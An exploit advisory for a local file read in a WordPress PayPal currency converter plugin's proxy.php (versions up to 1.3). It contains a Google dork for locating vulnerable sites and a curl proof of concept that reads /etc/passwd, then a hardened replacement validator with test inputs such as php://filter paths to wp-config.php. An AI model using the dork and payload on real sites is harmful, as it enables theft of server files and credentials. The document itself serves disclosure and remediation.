# Exploit Title: Paypal Currency Converter Basic For Woocommerce File Read
# Google Dork: inurl:"paypal-currency-converter-basic-for-woocommerce"
# Date: 10/06/2015
# Exploit Author: Kuroi'SH
# Software Link: https://wordpress.org/plugins/paypal-currency-converter-basic-for-woocommerce/
# Version: <=1.3
# Tested on: Linux

Description:

proxy.php's code:

<?php
// The requrl parameter is taken straight from the query string and passed to
// file_get_contents() with no scheme, host or path validation.
$file = file_get_contents($_GET['requrl']);
$left = strpos($file, '<div id=currency_converter_result>');
$right = strlen($file) - strpos($file, '<input type=hidden name=meta');
$snip = substr($file, $left, $right);
// Whatever was read is echoed back to the client.
echo $snip;
?>

Based on user input, the content of a file is read and printed out (it is not included, so PHP code in it is not executed). Any HTML file can therefore be loaded, and an attacker may be able to read any local file that is not executed by the server.

Example:

http://localhost/wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php?requrl=/etc/passwd

POC:

curl --silent --url http://localhost/wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php?requrl=/etc/passwd
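The root cause above is that `requrl` reaches `file_get_contents()` unvalidated, so local paths and non-HTTP stream wrappers are accepted. The following is an added example of how the fetch could be hardened; it is not the plugin's code and not part of the advisory. It assumes the plugin only ever needs one upstream converter endpoint (the `ALLOWED_HOSTS` value is a placeholder assumption), and it uses the WordPress HTTP API (`wp_remote_get`, `wp_remote_retrieve_body`, `esc_html`) in place of `file_get_contents`, so only http(s) is ever spoken and the response is escaped before being echoed.

```php
<?php
// Added example (not the plugin's code): validation that proxy.php lacks.
// ASSUMPTION: the single remote host the converter page is fetched from.
const ALLOWED_HOSTS = ['www.paypal.com'];

/**
 * Returns the URL unchanged if it is a plain https URL to an allowlisted host,
 * otherwise null. Local paths, file://, php:// and data: URLs all fail here,
 * which closes the local file read described in the advisory.
 */
function validate_requrl(string $requrl): ?string {
    // Not syntactically an absolute URL (e.g. "/etc/passwd") -> reject.
    if (filter_var($requrl, FILTER_VALIDATE_URL) === false) {
        return null;
    }
    $parts = parse_url($requrl);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return null;
    }
    if (strtolower($parts['scheme']) !== 'https') {
        return null;
    }
    if (!in_array(strtolower($parts['host']), ALLOWED_HOSTS, true)) {
        return null;
    }
    // Credentials or an explicit port are not needed for this use and are a
    // common way to smuggle a different destination past host checks.
    if (isset($parts['user']) || isset($parts['pass']) || isset($parts['port'])) {
        return null;
    }
    return $requrl;
}

/**
 * Fetches the converter page over the WordPress HTTP API and returns the
 * escaped snippet between the two markers, or '' on any failure.
 */
function fetch_converter_snippet(string $requrl): string {
    $url = validate_requrl($requrl);
    if ($url === null) {
        return '';
    }
    // redirection => 0: a redirect must not take us to a non-allowlisted host.
    $response = wp_remote_get($url, ['timeout' => 5, 'redirection' => 0]);
    if (is_wp_error($response) || wp_remote_retrieve_response_code($response) !== 200) {
        return '';
    }
    $body  = wp_remote_retrieve_body($response);
    $left  = strpos($body, '<div id=currency_converter_result>');
    $right = strpos($body, '<input type=hidden name=meta');
    if ($left === false || $right === false || $right <= $left) {
        return '';
    }
    // Escape so upstream HTML cannot inject markup into the store page.
    return esc_html(substr($body, $left, $right - $left));
}

// Constructed self-check of the validator; runs only from the CLI, outside WordPress.
if (PHP_SAPI === 'cli') {
    $cases = [
        '/etc/passwd'                               => null, // local path
        'file:///etc/passwd'                        => null, // file wrapper
        'php://filter/resource=wp-config.php'       => null, // php wrapper
        'http://www.paypal.com/cgi-bin/webscr'      => null, // https only
        'https://evil.example/@www.paypal.com/'     => null, // host is evil.example
        'https://www.paypal.com/cgi-bin/webscr?x=1' => 'https://www.paypal.com/cgi-bin/webscr?x=1',
    ];
    foreach ($cases as $input => $expected) {
        assert(validate_requrl($input) === $expected, "unexpected result for $input");
    }
    echo "validate_requrl: all constructed cases behaved as expected\n";
}
```

Running the file with `php` from the command line exercises only the validator; `fetch_converter_snippet()` needs a WordPress runtime. A request log entry with `requrl=` carrying a bare path or a non-https scheme is a direct indicator that this endpoint is being probed.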
Related: CVE-2015-5065, OSVDB 123187